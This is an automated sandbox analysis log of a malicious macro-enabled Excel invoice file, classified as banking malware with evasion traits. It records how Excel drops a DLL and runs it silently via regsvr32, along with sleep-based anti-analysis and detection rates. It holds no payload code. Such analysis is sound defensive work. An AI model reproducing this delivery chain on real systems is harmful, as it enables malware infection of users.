Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00478EF0	4_2_00478EF0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_004862F0	4_2_004862F0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0047AE80	4_2_0047AE80
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00478AB0	4_2_00478AB0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00481EB0	4_2_00481EB0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_004826B0	4_2_004826B0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0047BF50	4_2_0047BF50
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00475B60	4_2_00475B60
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00483B00	4_2_00483B00
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00489B10	4_2_00489B10
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00481730	4_2_00481730
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_004783C0	4_2_004783C0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00477FC0	4_2_00477FC0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00487FC0	4_2_00487FC0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_004767C8	4_2_004767C8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0047E3F0	4_2_0047E3F0

Source: INV9698791470-20210111920647.xlsm	OLE, VBA macro line: Private Sub view_1_a_Layout(ByVal Index As Long)
Source: VBA code instrumentation	OLE, VBA macro: Module Sheet1, Function view_1_a_Layout			Name: view_1_a_Layout

Source: INV9698791470-20210111920647.xlsm

OLE indicator, VBA macros: true

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXE 'C:\PROGRA~1\COMMON~1\MICROS~1\DW\DW20.EXE' -x -s 1804

Source: eb3kd1le[1].zip.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: eb3kd1le[1].zip.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: eb3kd1le[1].zip.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: eb3kd1le[1].zip.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: DWWIN.EXE, 00000006.00000002.2233596594.0000000003540000.00000002.00000001.sdmp

Binary or memory string: .VBPud<_

Source: classification engine

Classification label: mal100.bank.expl.evad.winXLSM@9/21@1/5

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$INV9698791470-20210111920647.xlsm

Jump to behavior

Source: C:\Windows\System32\DWWIN.EXE

Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2432

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRD345.tmp

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\regsvr32.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\DWWIN.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\DWWIN.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: INV9698791470-20210111920647.xlsm	Virustotal: Detection: 29%
Source: INV9698791470-20210111920647.xlsm	ReversingLabs: Detection: 17%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\deibsjhv.dll.
Source: unknown	Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\deibsjhv.dll.
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXE 'C:\PROGRA~1\COMMON~1\MICROS~1\DW\DW20.EXE' -x -s 1804
Source: unknown	Process created: C:\Windows\System32\DWWIN.EXE C:\Windows\system32\dwwin.exe -x -s 1804
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\deibsjhv.dll.	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXE 'C:\PROGRA~1\COMMON~1\MICROS~1\DW\DW20.EXE' -x -s 1804	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\deibsjhv.dll.	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXE	Process created: C:\Windows\System32\DWWIN.EXE C:\Windows\system32\dwwin.exe -x -s 1804	Jump to behavior

Source: C:\Windows\System32\DWWIN.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{713AACC8-3B71-435C-A3A1-BE4E53621AB1}\InProcServer32

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Automated click: OK
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: INV9698791470-20210111920647.xlsm	Initial sample: OLE zip file path = xl/media/image2.png
Source: INV9698791470-20210111920647.xlsm	Initial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: INV9698791470-20210111920647.xlsm

Initial sample: OLE indicators vbamacros = False

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 4_2_10002140 LoadLibraryA,GetProcAddress,VirtualAlloc,VirtualAlloc,VirtualAlloc,

4_2_10002140

Source: eb3kd1le[1].zip.0.dr	Static PE information: section name: .rdata3
Source: eb3kd1le[1].zip.0.dr	Static PE information: section name: .2
Source: eb3kd1le[1].zip.0.dr	Static PE information: section name: .rdata2
Source: eb3kd1le[1].zip.0.dr	Static PE information: section name: .text4

Source: unknown

Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\deibsjhv.dll.

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_1000400A push esi; retf	4_2_1000401D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_10010810 pushfd ; retf	4_2_1001084E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_1000D856 push ebp; retf	4_2_1000D85E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_1000E8F3 pushad ; iretd	4_2_1000E8F4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_10002140 push ecx; ret	4_2_100021B6
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_1001CD9B push esp; retf	4_2_1001CDB0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_1000C265 push 588A19FDh; iretd	4_2_1000C278
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_10020A73 push edx; iretd	4_2_10020A9C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_1000FEBF push eax; iretd	4_2_1000FEC0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_1000FEFA push 00000000h; iretd	4_2_1000FF10
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_10023EFF push eax; iretd	4_2_10023F64
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_1000C304 push 588A1BCDh; iretd	4_2_1000C314
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_10010307 push esp; retf	4_2_10010308
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_1000CF15 push 0000002Dh; iretd	4_2_1000CF1C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_1001DB23 push eax; iretd	4_2_1001DB34
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_10020B27 push eax; iretd	4_2_10020B28
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_1000DFC7 pushad ; iretd	4_2_1000DFC8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_10023FEB push edx; ret	4_2_10024001
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_100107FB pushfd ; retf	4_2_1001084E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_001FBFA0 push edx; ret	4_2_001FC259
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_001C7172 push dword ptr [ebp+ecx*8-49h]; retf	4_2_001C7176
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_001E62CD pushad ; iretd	4_2_001E62E5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_001DF6CD push esi; ret	4_2_001DF6D7
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_001C899D push 00000369h; ret	4_2_001C8A28
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_001C89CD push 00000369h; ret	4_2_001C8A28
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_001EFB74 push esi; ret	4_2_001EFB8B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_001C1D11 push FFFFFFD5h; ret	4_2_001C1D18
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_001C0E8F push esi; ret	4_2_001C0E94

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\eb3kd1le[1].zip			Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Temp\deibsjhv.dll			Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\eb3kd1le[1].zip

Jump to dropped file

Source: C:\Windows\SysWOW64\regsvr32.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\DWWIN.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\DWWIN.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\DWWIN.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\DWWIN.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\DWWIN.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\DWWIN.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\DWWIN.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\DWWIN.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\DWWIN.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\DWWIN.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\DWWIN.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\DWWIN.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\DWWIN.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\DWWIN.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\DWWIN.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 4_2_001D88DD rdtsc

4_2_001D88DD

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,GetAdaptersInfo,LoadLibraryW,

4_2_00465150

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\eb3kd1le[1].zip

Jump to dropped file

Source: C:\Windows\SysWOW64\regsvr32.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_4-34230

Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2704	Thread sleep time: -240000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276	Thread sleep time: -792000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276	Thread sleep time: -510000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276	Thread sleep time: -845000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276	Thread sleep time: -341000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276	Thread sleep time: -610000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276	Thread sleep time: -816000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276	Thread sleep time: -1169000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276	Thread sleep time: -351000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276	Thread sleep time: -146000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276	Thread sleep time: -306000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276	Thread sleep time: -304000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276	Thread sleep time: -354000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276	Thread sleep time: -414000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276	Thread sleep time: -314000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276	Thread sleep time: -335000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276	Thread sleep time: -474000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276	Thread sleep time: -840000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276	Thread sleep time: -586000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276	Thread sleep time: -260000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276	Thread sleep time: -519000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276	Thread sleep time: -248000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276	Thread sleep time: -512000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276	Thread sleep time: -484000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276	Thread sleep time: -328000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276	Thread sleep time: -660000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276	Thread sleep time: -462000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276	Thread sleep time: -447000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276	Thread sleep time: -307000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276	Thread sleep time: -1062000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276	Thread sleep time: -120000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276	Thread sleep time: -620000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276	Thread sleep time: -584000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276	Thread sleep time: -306000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276	Thread sleep time: -302000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276	Thread sleep time: -332000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276	Thread sleep time: -359000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276	Thread sleep time: -348000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276	Thread sleep time: -972000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276	Thread sleep time: -698000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276	Thread sleep time: -528000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276	Thread sleep time: -320000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276	Thread sleep time: -592000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276	Thread sleep time: -342000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276	Thread sleep time: -665000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276	Thread sleep time: -560000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276	Thread sleep time: -508000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276	Thread sleep time: -134000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276	Thread sleep time: -252000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276	Thread sleep time: -516000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276	Thread sleep time: -534000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276	Thread sleep time: -270000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276	Thread sleep time: -369000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276	Thread sleep time: -301000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276	Thread sleep time: -1011000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276	Thread sleep time: -342000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276	Thread sleep time: -429000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276	Thread sleep time: -252000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276	Thread sleep time: -664000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276	Thread sleep time: -310000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276	Thread sleep time: -384000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276	Thread sleep time: -284000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276	Thread sleep time: -426000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276	Thread sleep time: -179000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276	Thread sleep time: -250000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276	Thread sleep time: -245000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276	Thread sleep time: -278000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276	Thread sleep time: -1113000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276	Thread sleep time: -522000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276	Thread sleep time: -273000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276	Thread sleep time: -635000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276	Thread sleep time: -294000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276	Thread sleep time: -129000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276	Thread sleep time: -298000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276	Thread sleep time: -331000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276	Thread sleep time: -290000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276	Thread sleep time: -548000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276	Thread sleep time: -300000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276	Thread sleep time: -525000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276	Thread sleep time: -262000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276	Thread sleep time: -125000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276	Thread sleep time: -295000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276	Thread sleep time: -285000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276	Thread sleep time: -163000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276	Thread sleep time: -325000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276	Thread sleep time: -312000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276	Thread sleep time: -290000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276	Thread sleep time: -334000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1276	Thread sleep time: -317000s >= -30000s	Jump to behavior
